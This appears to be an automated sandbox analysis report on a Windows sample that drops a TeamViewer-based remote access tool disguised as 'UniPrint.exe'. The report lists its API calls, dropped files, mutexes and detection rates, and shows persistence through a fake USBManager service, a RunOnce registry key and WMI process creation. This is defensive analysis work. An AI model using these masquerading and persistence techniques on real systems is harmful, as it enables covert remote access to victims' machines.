Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C8AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB340 NtGetContextThread,NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB160 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C89F0 NtQuerySystemInformation,StrChrW,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,StrChrW,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB650 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C26E0 StrChrW,RtlZeroMemory,NtCreateSection,StrChrW,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,StrChrW,NtClose,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C27F0 GetFileAttributesW,StrChrW,GetProcessHeap,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RtlZeroMemory,RtlZeroMemory,CreateProcessW,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2FF0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C2440 LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetCommandLineW,CommandLineToArgvW,lstrcmpiW,lstrcmpiW,StrRChrW,StrChrW,wsprintfW,OpenEventW,CreateEventW,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1C90 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1570 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C5220 RtlZeroMemory,RtlZeroMemory,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,StrChrW,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1A80 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CA880 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB0B9 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C1960 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5CB1A0 NtOpenThread,
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: No import functions for PE file found
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTV.dllT vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs wogZe27GBB.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs wogZe27GBB.exe
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: wogZe27GBB.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UniPrint.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeSection loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C3850 OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: wogZe27GBB.exeVirustotal: Detection: 53%
Source: wogZe27GBB.exeReversingLabs: Detection: 62%
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\user\Desktop\wogZe27GBB.exeJump to behavior
Source: wogZe27GBB.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\wogZe27GBB.exe 'C:\Users\user\Desktop\wogZe27GBB.exe'
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f
Source: C:\Users\user\Desktop\wogZe27GBB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_6E5C5F30 CommandLineToArgvW,GetProcessHeap,HeapFree,CharLowerW,GetProcessHeap,HeapAlloc,RtlComputeCrc32,GetProcessHeap,HeapFree,GetTickCount,RtlRandom,StrChrW,wsprintfW,WritePrivateProfileStringW,Sleep,Sleep,GetDlgItem,PostMessageW,PostMessageW,PostMessageW,Sleep,Sleep,PostMessageW,Sleep,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,DeleteFileW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,GetTickCount,RtlRandom,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,wsprintfW,GetFileAttributesW,DeleteFileW,StrChrW,StrChrW,StrChrW,wsprintfW,ExpandEnvironmentStringsW,PathIsRelativeW,StrChrW,wsprintfW,StrRChrW,SHCreateDirectoryExW,StrChrW,GetProcessHeap,HeapFree,LocalFree,GetProcessHeap,HeapFree,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPCJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Local\Temp\nsrC1C9.tmpJump to behavior
Source: nsrC1CA.tmp.0.drBinary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engineClassification label: mal72.evad.winEXE@13/7@4/5
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C2AC0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,StrChrW,StrChrW,SysAllocString,StrChrW,SysAllocString,SysFreeString,VariantInit,VariantInit,StrChrW,StrChrW,lstrlenW,SysAllocStringLen,PathQuoteSpacesW,VariantInit,StrChrW,SysAllocString,StrChrW,VariantInit,StrChrW,StrChrW,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: OpenSCManagerW,OpenSCManagerW,OpenSCManagerW,StrChrW,StrChrW,OpenServiceW,wsprintfW,RegSetValueExW,StrChrW,StrChrW,StrChrW,wsprintfW,StrChrW,StrChrW,CreateServiceW,ChangeServiceConfig2W,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,StrChrW,lstrlenW,StrChrW,StrChrW,RegSetValueExW,RegCloseKey,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,RegCreateKeyExW,RtlZeroMemory,StrChrW,RegQueryValueExW,lstrcmpiW,StrChrW,RegSetValueExW,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,StrChrW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,73D5A680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C9B10 SwitchDesktop,SetThreadDesktop,LoadLibraryW,GetProcessHeap,HeapAlloc,RtlZeroMemory,GetSystemDirectoryW,PathAddBackslashW,lstrcatW,LoadLibraryExW,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,StrChrW,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAMOEBAAAA
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5180 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile written: C:\Users\user\AppData\Roaming\ViberPC\Icons\TeamViewer.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: wogZe27GBB.exeStatic file information: File size 1773472 > 1048576
Source: wogZe27GBB.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000002.707742521.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1076091636.000000006E5CC000.00000002.00020000.sdmp, svchost.exe, 00000007.00000002.1072106592.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759626756.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.762333599.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000002.776275044.000000006E5CC000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.780622367.000000006E5CC000.00000002.00020000.sdmp, nsrC1CA.tmp.0.dr
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, nsrC1CA.tmp.0.dr
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053E60D push ecx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_0053BD8D push ecx; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029AFAC6 push eax; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029B24F9 pushfd ; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029AFAC6 push eax; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 11_3_029B24F9 pushfd ; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 12_2_027E6D2C push ds; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 12_2_027E6FCC push esi; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 14_3_0285EBC8 push eax; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 14_3_0282E9D5 push ebp; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 14_3_0282E35C push ebp; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 14_3_0282E57C push ecx; retf
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 14_3_0282E9D5 push ebp; ret
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 14_3_0282E35C push ebp; iretd
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 14_3_0282E57C push ecx; retf
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to dropped file
Source: C:\Users\user\Desktop\wogZe27GBB.exeFile created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 5_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\ParametersJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C3920 QueryServiceConfigW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,QueryServiceConfigW,ChangeServiceConfigW,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceW,
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exeJump to behavior
